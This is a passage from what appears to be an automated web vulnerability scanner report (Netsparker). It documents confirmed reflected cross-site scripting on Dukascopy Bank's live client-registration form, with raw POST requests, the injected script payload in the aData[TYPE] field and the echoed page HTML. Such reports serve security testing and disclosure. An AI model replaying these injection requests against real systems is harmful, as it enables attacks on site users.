&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000154)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;BBAC47&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BTYPE%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000165)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 301
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000165)%3c%2fscript%3e&amp;aData%5BaccountKind%5D=200&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
